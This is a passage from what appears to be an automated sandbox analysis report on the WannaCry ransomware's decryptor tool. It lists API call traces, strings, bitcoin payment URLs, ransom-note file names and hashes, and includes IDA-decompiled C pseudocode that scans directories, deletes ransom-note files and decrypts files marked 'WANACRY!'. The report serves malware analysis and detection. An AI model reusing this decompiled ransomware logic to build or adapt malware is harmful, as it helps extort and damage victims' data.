                                                      • #537.MFC42(https://en.wikipedia.org/wiki/Bitcoin,?,?,?,767B20C0,?), ref: 004072F9
                                                      • #537.MFC42(https://www.google.com/search?q=how+to+buy+bitcoin,?,?,?,?,767B20C0,?), ref: 00407315
                                                      • #540.MFC42(?,?,?,?,767B20C0,?), ref: 00407329
                                                      • #2818.MFC42(?,mailto:%s,?,?,?,?,?,767B20C0,?), ref: 0040734A
                                                      • #535.MFC42(?), ref: 0040735D
                                                      • #2818.MFC42(?,http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s,00000000), ref: 00407385
                                                      • #535.MFC42(?), ref: 00407398
                                                        • Part of subcall function 00404210: #858.MFC42(?,?,00413788,000000FF), ref: 00404235
                                                        • Part of subcall function 00404210: #800.MFC42(?,?,00413788,000000FF), ref: 00404246
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073B8
                                                      • SendMessageA.USER32(?,00000406,00000000,00000064), ref: 004073CA
                                                      • #6140.MFC42(00000002,000000FF), ref: 004073D6
                                                      • #6140.MFC42(00000002,000000FF,00000002,000000FF), ref: 004073FF
                                                        • Part of subcall function 00405860: GetClientRect.USER32(?,?), ref: 0040587E
                                                        • Part of subcall function 00405860: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                                        • Part of subcall function 004058C0: GetClientRect.USER32(?,?), ref: 004058DE
                                                        • Part of subcall function 004058C0: #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                                        • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
                                                        • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
                                                        • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                        • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      • GetTimeZoneInformation.KERNEL32(?,0000000B,00000001,0000000B,00000001,00000002,000000FF,00000002,000000FF), ref: 004074DA
                                                        • Part of subcall function 00401E60: VariantTimeToSystemTime.OLEAUT32(?), ref: 00401E7B
                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 00407520
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 0040756E
                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004075AD
                                                      • #2818.MFC42(?,%d/%d/%d %02d:%02d:%02d,?,?,?,?,?,?), ref: 004075FB
                                                      • #6334.MFC42(00000000), ref: 00407607
                                                      • #800.MFC42 ref: 0040761B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641CreateMessageSend$#3092$BrushSolid$Time$#2818$FontRectSystem$#535#537#6140#6197#800#860ClientLocalSpecific$#540#6334#858InformationInvalidateRedrawVariantWindowZone_mbscmptime
                                                      • String ID: %d/%d/%d %02d:%02d:%02d$00;00;00;00$Arial$http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s$https://en.wikipedia.org/wiki/Bitcoin$https://www.google.com/search?q=how+to+buy+bitcoin$mailto:%s
                                                      • API String ID: 28786460-3869059234
                                                      • Opcode ID: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                                      • Instruction ID: 980e8df72422c457d288d06354c1d21c6ecb0c69e0d4732a7e3947204bb0ebed
                                                      • Opcode Fuzzy Hash: 566e78bac420e29277e274eb052adce88cec53491b2e7cfac5d24ca603e09d5b
                                                      • Instruction Fuzzy Hash: DB02D3B0344705ABD624EB61CC92FBF339AAFC4B04F00452DF2566B2D1DEB8B5058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E004026B0(void* __ecx) {
                                                      				void* _t109;
                                                      				intOrPtr* _t110;
                                                      				int _t111;
                                                      				void* _t115;
                                                      				intOrPtr* _t116;
                                                      				intOrPtr* _t123;
                                                      				intOrPtr _t124;
                                                      				char _t125;
                                                      				intOrPtr* _t129;
                                                      				intOrPtr* _t131;
                                                      				intOrPtr* _t135;
                                                      				int _t139;
                                                      				int _t145;
                                                      				int _t146;
                                                      				int _t147;
                                                      				int _t149;
                                                      				int _t154;
                                                      				intOrPtr* _t221;
                                                      				void _t225;
                                                      				intOrPtr* _t226;
                                                      				wchar_t* _t227;
                                                      				intOrPtr* _t228;
                                                      				intOrPtr* _t229;
                                                      				void* _t231;
                                                      				void* _t232;
                                                      				intOrPtr _t234;
                                                      				void* _t235;
                                                      				void* _t236;
                                                      				void* _t237;
                                                      				void* _t238;
                                                      				void* _t239;
                                                      				void* _t240;
                                                      				void* _t242;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041356E);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t234;
                                                      				_t235 = _t234 - 0x56c;
                                                      				_t232 = __ecx;
                                                      				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
                                                      				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
                                                      				 *((intOrPtr*)(_t235 + 0x24)) = 0;
                                                      				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
                                                      				 *(_t235 + 0x584) = 0;
                                                      				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
                                                      				 *((intOrPtr*)(_t235 + 0x14)) = 0;
                                                      				 *((char*)(_t235 + 0x588)) = 1;
                                                      				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
                                                      				_t236 = _t235 + 0xc;
                                                      				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
                                                      				 *(_t236 + 0x18) = _t109;
                                                      				if(_t109 != 0xffffffff) {
                                                      					while(1) {
                                                      						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      						if(_t110 != 0 &&  *_t110 != 0) {
                                                      							break;
                                                      						}
                                                      						_t111 = wcscmp(_t236 + 0x358, ".");
                                                      						_t236 = _t236 + 8;
                                                      						if(_t111 != 0) {
                                                      							_t139 = wcscmp(_t236 + 0x358, L"..");
                                                      							_t236 = _t236 + 8;
                                                      							if(_t139 != 0) {
                                                      								_push(_t236 + 0x358);
                                                      								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
                                                      								_t236 = _t236 + 0x10;
                                                      								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
                                                      									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
                                                      									_t236 = _t236 + 8;
                                                      									if(_t145 != 0) {
                                                      										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
                                                      										_t236 = _t236 + 8;
                                                      										if(_t146 != 0) {
                                                      											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
                                                      											_t236 = _t236 + 8;
                                                      											if(_t147 != 0) {
                                                      												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
                                                      												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                                      												_t149 = wcslen(_t236 + 0x5c);
                                                      												_t236 = _t236 + 4;
                                                      												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
                                                      												 *((char*)(_t236 + 0x590)) = 3;
                                                      												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
                                                      												 *((char*)(_t236 + 0x584)) = 1;
                                                      												_push(1);
                                                      												goto L14;
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
                                                      										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
                                                      										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                                      										_t154 = wcslen(_t236 + 0x5c);
                                                      										_t236 = _t236 + 4;
                                                      										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
                                                      										 *((char*)(_t236 + 0x590)) = 2;
                                                      										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
                                                      										 *((char*)(_t236 + 0x584)) = 1;
                                                      										_push(1);
                                                      										L14:
                                                      										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					FindClose( *(_t236 + 0x20));
                                                      					_t115 =  *(_t236 + 0x18);
                                                      					_t225 =  *_t115;
                                                      					if(_t225 != _t115) {
                                                      						while(1) {
                                                      							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      							if(_t135 != 0 &&  *_t135 != 0) {
                                                      								goto L22;
                                                      							}
                                                      							_t136 =  *((intOrPtr*)(_t225 + 0xc));
                                                      							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
                                                      								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                                      							}
                                                      							E00402560(_t232, _t136);
                                                      							_t225 =  *_t225;
                                                      							if(_t225 !=  *(_t236 + 0x18)) {
                                                      								continue;
                                                      							}
                                                      							goto L22;
                                                      						}
                                                      					}
                                                      					L22:
                                                      					_t116 =  *((intOrPtr*)(_t236 + 0x28));
                                                      					_t226 =  *_t116;
                                                      					if(_t226 != _t116) {
                                                      						while(1) {
                                                      							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      							if(_t131 != 0 &&  *_t131 != 0) {
                                                      								goto L28;
                                                      							}
                                                      							_t132 =  *((intOrPtr*)(_t226 + 0xc));
                                                      							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
                                                      								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                                      							}
                                                      							E004026B0(_t232, _t132);
                                                      							_t226 =  *_t226;
                                                      							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
                                                      								continue;
                                                      							}
                                                      							goto L28;
                                                      						}
                                                      					}
                                                      					L28:
                                                      					_t227 =  *(_t236 + 0x58c);
                                                      					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
                                                      					_t237 = _t236 + 0x10;
                                                      					DeleteFileW(_t237 + 0x5c);
                                                      					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
                                                      					_t238 = _t237 + 0x10;
                                                      					DeleteFileW(_t238 + 0x5c);
                                                      					_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                                      					 *((char*)(_t238 + 0x584)) = 0;
                                                      					_t221 = _t123;
                                                      					_t228 =  *_t123;
                                                      					if(_t228 != _t123) {
                                                      						do {
                                                      							_t129 = _t228;
                                                      							_t228 =  *_t228;
                                                      							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
                                                      						} while (_t228 != _t221);
                                                      						_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                                      					}
                                                      					_push(_t123);
                                                      					L00412C98();
                                                      					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
                                                      					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
                                                      					 *((intOrPtr*)(_t238 + 0x20)) = 0;
                                                      					_t239 = _t238 + 4;
                                                      					_t124 =  *_t229;
                                                      					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
                                                      					if(_t124 != _t229) {
                                                      						do {
                                                      							_push(0);
                                                      							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
                                                      						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
                                                      					}
                                                      					_push( *((intOrPtr*)(_t239 + 0x28)));
                                                      					L00412C98();
                                                      					_t240 = _t239 + 4;
                                                      					_t125 = 1;
                                                      				} else {
                                                      					 *((char*)(_t236 + 0x57c)) = 0;
                                                      					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
                                                      					_push( *((intOrPtr*)(_t236 + 0x10)));
                                                      					L00412C98();
                                                      					_t242 = _t236 + 4;
                                                      					 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                                      					 *((intOrPtr*)(_t242 + 0x14)) = 0;
                                                      					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
                                                      					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
                                                      					_push( *((intOrPtr*)(_t242 + 0x20)));
                                                      					L00412C98();
                                                      					_t240 = _t242 + 4;
                                                      					_t125 = 0;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
                                                      				return _t125;
                                                      			}




































                                                      0x00402a7f
                                                      0x00402a81
                                                      0x00402a8e
                                                      0x00402a92
                                                      0x00402a94
                                                      0x00402a98
                                                      0x00402aaf
                                                      0x00402ab4
                                                      0x00402a94
                                                      0x00402abe
                                                      0x00402abf
                                                      0x00402ac4
                                                      0x00402ac7
                                                      0x0040274d
                                                      0x00402751
                                                      0x00402765
                                                      0x0040276e
                                                      0x0040276f
                                                      0x00402778
                                                      0x0040277b
                                                      0x0040277f
                                                      0x00402790
                                                      0x0040279b
                                                      0x004027a4
                                                      0x004027a5
                                                      0x004027aa
                                                      0x004027ad
                                                      0x004027ad
                                                      0x00402ad7
                                                      0x00402ae4

                                                      APIs
                                                        • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                                      • swprintf.MSVCRT ref: 00402728
                                                      • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                                      • #825.MFC42(?,?,?,?), ref: 0040276F
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?), ref: 004027A5
                                                      • wcscmp.MSVCRT ref: 004027E1
                                                      • wcscmp.MSVCRT ref: 004027FB
                                                      • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                                      • wcslen.MSVCRT ref: 0040286E
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                                      • FindClose.KERNEL32(?), ref: 0040297D
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                                      • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                      • API String ID: 1037557366-268640142
                                                      • Opcode ID: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                                      • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                                      • Opcode Fuzzy Hash: e79b0c1c647add8853af76cbf20fb173565abedc36f5e4bac0d8a38ddea0bf7b
                                                      • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                      				struct _OVERLAPPED* _v8;
                                                      				char _v20;
                                                      				long _v32;
                                                      				long _v36;
                                                      				union _LARGE_INTEGER* _v40;
                                                      				void _v44;
                                                      				char _v48;
                                                      				char _v560;
                                                      				struct _OVERLAPPED* _v564;
                                                      				union _LARGE_INTEGER* _v568;
                                                      				void _v572;
                                                      				char _v573;
                                                      				short _v575;
                                                      				intOrPtr _v579;
                                                      				void _v580;
                                                      				struct _FILETIME _v588;
                                                      				struct _FILETIME _v596;
                                                      				struct _FILETIME _v604;
                                                      				void* _v608;
                                                      				void _v612;
                                                      				void _v616;
                                                      				void* _v620;
                                                      				intOrPtr _v624;
                                                      				void* __ebx;
                                                      				void* __ebp;
                                                      				int _t109;
                                                      				int _t113;
                                                      				int _t115;
                                                      				int _t116;
                                                      				int _t118;
                                                      				void* _t119;
                                                      				signed int _t122;
                                                      				signed int _t137;
                                                      				signed int _t139;
                                                      				int _t140;
                                                      				signed int _t141;
                                                      				int _t145;
                                                      				signed int _t148;
                                                      				int _t152;
                                                      				int _t155;
                                                      				void* _t159;
                                                      				intOrPtr _t196;
                                                      				signed int _t212;
                                                      				signed int _t213;
                                                      				void* _t216;
                                                      				intOrPtr _t223;
                                                      				signed int _t224;
                                                      				void* _t226;
                                                      				intOrPtr _t227;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x4158c8);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t227;
                                                      				_push(_t212);
                                                      				_v624 = __ecx;
                                                      				_t213 = _t212 | 0xffffffff;
                                                      				_v620 = _t213;
                                                      				_v608 = _t213;
                                                      				_v48 = 0;
                                                      				_v616 = 0;
                                                      				_v580 = 0;
                                                      				_v579 = 0;
                                                      				_v575 = 0;
                                                      				_v573 = 0;
                                                      				_v612 = 0;
                                                      				_v36 = 0;
                                                      				_v32 = 0;
                                                      				_v564 = 0;
                                                      				_v8 = 0;
                                                      				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                                      				_v620 = _t159;
                                                      				if(_t159 != _t213) {
                                                      					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
                                                      					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
                                                      					__eflags = _t109;
                                                      					if(_t109 == 0) {
                                                      						L32:
                                                      						_push(0xffffffff);
                                                      						_push( &_v20);
                                                      						goto L33;
                                                      					} else {
                                                      						__eflags = 0;
                                                      						asm("repe cmpsd");
                                                      						if(0 != 0) {
                                                      							goto L32;
                                                      						} else {
                                                      							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
                                                      							__eflags = _t113;
                                                      							if(_t113 == 0) {
                                                      								goto L32;
                                                      							} else {
                                                      								__eflags = _v616 - 0x100;
                                                      								if(_v616 != 0x100) {
                                                      									goto L32;
                                                      								} else {
                                                      									_t223 = _v624;
                                                      									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
                                                      									__eflags = _t115;
                                                      									if(_t115 == 0) {
                                                      										goto L32;
                                                      									} else {
                                                      										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
                                                      										__eflags = _t116;
                                                      										if(_t116 == 0) {
                                                      											goto L32;
                                                      										} else {
                                                      											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
                                                      											__eflags = _t118;
                                                      											if(_t118 == 0) {
                                                      												goto L32;
                                                      											} else {
                                                      												__eflags = _v612 - 3;
                                                      												if(_v612 != 3) {
                                                      													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
                                                      													_t216 = _t119;
                                                      													_v608 = _t216;
                                                      													__eflags = _t216 - 0xffffffff;
                                                      													if(_t216 != 0xffffffff) {
                                                      														_push( &_v48);
                                                      														_push( &_v560);
                                                      														_t51 = _t223 + 4; // 0x4
                                                      														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
                                                      														__eflags = _t122;
                                                      														if(_t122 != 0) {
                                                      															L22:
                                                      															_t59 = _t223 + 0x54; // 0x54
                                                      															_push(0x10);
                                                      															_push(_v48);
                                                      															_t196 =  *0x4213b0; // 0x4218b0
                                                      															_push(_t196);
                                                      															_push( &_v560);
                                                      															E0040A150(_t59);
                                                      															_v44 = _v572;
                                                      															_v40 = _v568;
                                                      															while(1) {
                                                      																__eflags = _v40;
                                                      																if(__eflags < 0) {
                                                      																	break;
                                                      																}
                                                      																if(__eflags > 0) {
                                                      																	L26:
                                                      																	_t139 =  *(_t223 + 0x4d0);
                                                      																	__eflags = _t139;
                                                      																	if(_t139 == 0) {
                                                      																		L28:
                                                      																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
                                                      																		__eflags = _t140;
                                                      																		if(_t140 == 0) {
                                                      																			L34:
                                                      																			_push(0xffffffff);
                                                      																			_push( &_v20);
                                                      																			goto L33;
                                                      																		} else {
                                                      																			_t141 = _v36;
                                                      																			__eflags = _t141;
                                                      																			if(_t141 == 0) {
                                                      																				goto L34;
                                                      																			} else {
                                                      																				_v44 = _v44 - _t141;
                                                      																				asm("sbb dword [ebp-0x24], 0x0");
                                                      																				_t76 = _t223 + 0x54; // 0x54
                                                      																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
                                                      																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
                                                      																				__eflags = _t145;
                                                      																				if(_t145 == 0) {
                                                      																					goto L32;
                                                      																				} else {
                                                      																					__eflags = _v32 - _v36;
                                                      																					if(_v32 == _v36) {
                                                      																						continue;
                                                      																					} else {
                                                      																						goto L32;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																	} else {
                                                      																		__eflags =  *_t139;
                                                      																		if( *_t139 != 0) {
                                                      																			goto L32;
                                                      																		} else {
                                                      																			goto L28;
                                                      																		}
                                                      																	}
                                                      																} else {
                                                      																	__eflags = _v44;
                                                      																	if(_v44 <= 0) {
                                                      																		break;
                                                      																	} else {
                                                      																		goto L26;
                                                      																	}
                                                      																}
                                                      																goto L41;
                                                      															}
                                                      															_push(0);
                                                      															SetFilePointerEx(_t216, _v572, _v568, 0);
                                                      															SetEndOfFile(_t216);
                                                      															goto L36;
                                                      														} else {
                                                      															_push( &_v48);
                                                      															_push( &_v560);
                                                      															_t56 = _t223 + 0x2c; // 0x2c
                                                      															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
                                                      															__eflags = _t148;
                                                      															if(_t148 != 0) {
                                                      																_v564 = 1;
                                                      																goto L22;
                                                      															} else {
                                                      																goto L20;
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_push(_t119);
                                                      														_push( &_v20);
                                                      														goto L33;
                                                      													}
                                                      												} else {
                                                      													CloseHandle(_t159);
                                                      													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
                                                      													_v620 = _t159;
                                                      													__eflags = _t159 - 0xffffffff;
                                                      													if(_t159 == 0xffffffff) {
                                                      														goto L32;
                                                      													} else {
                                                      														SetFilePointer(_t159, 0xffff0000, 0, 2);
                                                      														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
                                                      														__eflags = _t152;
                                                      														if(_t152 == 0) {
                                                      															goto L32;
                                                      														} else {
                                                      															__eflags = _v36 - 0x10000;
                                                      															if(_v36 != 0x10000) {
                                                      																goto L32;
                                                      															} else {
                                                      																SetFilePointer(_t159, 0, 0, 0);
                                                      																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
                                                      																__eflags = _t155;
                                                      																if(_t155 == 0) {
                                                      																	L20:
                                                      																	_push(0xffffffff);
                                                      																	_push( &_v20);
                                                      																	goto L33;
                                                      																} else {
                                                      																	__eflags = _v32 - 0x10000;
                                                      																	if(_v32 != 0x10000) {
                                                      																		goto L20;
                                                      																	} else {
                                                      																		SetFilePointer(_t159, 0xffff0000, 0, 2);
                                                      																		SetEndOfFile(_t159);
                                                      																		_t216 = _v608;
                                                      																		L36:
                                                      																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
                                                      																		__eflags = _v612 - 3;
                                                      																		if(_v612 == 3) {
                                                      																			_t137 = CloseHandle(_t159) | 0xffffffff;
                                                      																			__eflags = _t137;
                                                      																			_v608 = _t137;
                                                      																			_v620 = _t137;
                                                      																			MoveFileW(_a4, _a8);
                                                      																		}
                                                      																		_t224 =  *(_t223 + 0x4d4);
                                                      																		__eflags = _t224;
                                                      																		if(_t224 != 0) {
                                                      																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
                                                      																		}
                                                      																		_push(0xffffffff);
                                                      																		_push( &_v20);
                                                      																		L00413056();
                                                      																		 *[fs:0x0] = _v20;
                                                      																		return 1;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_push(_t213);
                                                      					_push( &_v20);
                                                      					L33:
                                                      					L00413056();
                                                      					 *[fs:0x0] = _v20;
                                                      					return 0;
                                                      				}
                                                      				L41:
                                                      			}

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                                      • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                                      • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                                      • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                                      • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402234
                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                                      • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                                      • _local_unwind2.MSVCRT ref: 00402452
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                                      • String ID: WANACRY!
                                                      • API String ID: 1586634678-1240840912
